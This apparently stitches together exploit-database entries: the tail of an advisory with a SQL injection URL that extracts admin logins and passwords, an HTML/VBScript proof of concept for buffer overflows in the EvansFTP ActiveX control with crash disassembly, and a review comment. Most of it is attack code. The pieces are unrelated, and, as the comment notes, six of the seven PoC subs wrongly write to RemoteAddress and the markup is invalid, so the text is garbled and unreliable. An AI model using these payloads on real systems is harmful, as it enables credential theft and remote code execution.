Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login--


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32814/info
Evans FTP ActiveX control is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
<HTML> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' /> <HEAD> <TITLE>EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC</TITLE> </HEAD> <BODY> [+] Application : EvansFTP ActiveX <br> [+] CompanyName : Evans Programming <br> [+] Description : Multi-threaded asynchronus Active-X FTP Control<br> [+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}<br> [+] Exploit : Remote BoF (PoC)<br> [+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr<br><br> [+] Object Safety Report :<br> Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br><br> RegKey Safe for Script: Faux<br> RegkeySafe for Init: Faux<br> KillBitSet: Faux<br> <br><br> The Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact : <br> 1- RemoteAddress suffers from a BoF when we pass a string over 2068 <br> 2- ProxyPrefix suffers from a BoF when we pass a string over 1044 <br> 3- ProxyName suffers from a BoF when we pass a string over 1044 <br> 4- Password suffers from a BoF when we pass a string over 1044 <br> 5- ProxyBypassList suffers from a BoF when we pass a string over 1044 <br> 6- LoginName suffers from a BoF when we pass a string over 1044 <br> 7- CurrentDirectory suffers from a BoF when we pass a string over 1044 <br><br> DisASM RemoteAddress Crash :<br><pre> 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00 </pre> <script language='vbscript'> Sub 
RemoteAddress arg1=String(2068, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyPrefix arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub Password arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub ProxyBypassList arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub LoginName arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub Sub CurrentDirectory arg1=String(1044, "A") beard.RemoteAddress = arg1 End Sub </script><br><br> <INPUT TYPE="button" VALUE="RemoteAddress PoC" ONCLICK=RemoteAddress()> <INPUT TYPE="button" VALUE="ProxyPrefix PoC" ONCLICK=ProxyPrefix()> <INPUT TYPE="button" VALUE="ProxyName PoC" ONCLICK=ProxyName()> <INPUT TYPE="button" VALUE="Password PoC" ONCLICK=Password()> <INPUT TYPE="button" VALUE="ProxyBypassList PoC" ONCLICK=ProxyBypassList()> <INPUT TYPE="button" VALUE="LoginName PoC" ONCLICK=LoginName()> <INPUT TYPE="button" VALUE="CurrentDirectory PoC" ONCLICK=CurrentDirectory()><br><br> Brought to You by Bl@ckbe@rD<br> Peace xD </BODY> </HTML>
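Review bot: all seven VBScript subs assign to `beard.RemoteAddress`, so the `ProxyPrefix`, `ProxyName`, `Password`, `ProxyBypassList`, `LoginName` and `CurrentDirectory` buttons never touch the property they are named after; the PoC therefore only demonstrates the RemoteAddress case, and the 1044-byte thresholds listed for the other six properties are not exercised by this file. The document also wraps the HTML in a WSH `<package><job>` element and places the `<object>` tag before `<HEAD>`, so it is neither a valid HTML page nor a valid WSF script; the safety report strings (`Faux`, `Vrai`) are untranslated French output from the reporting tool.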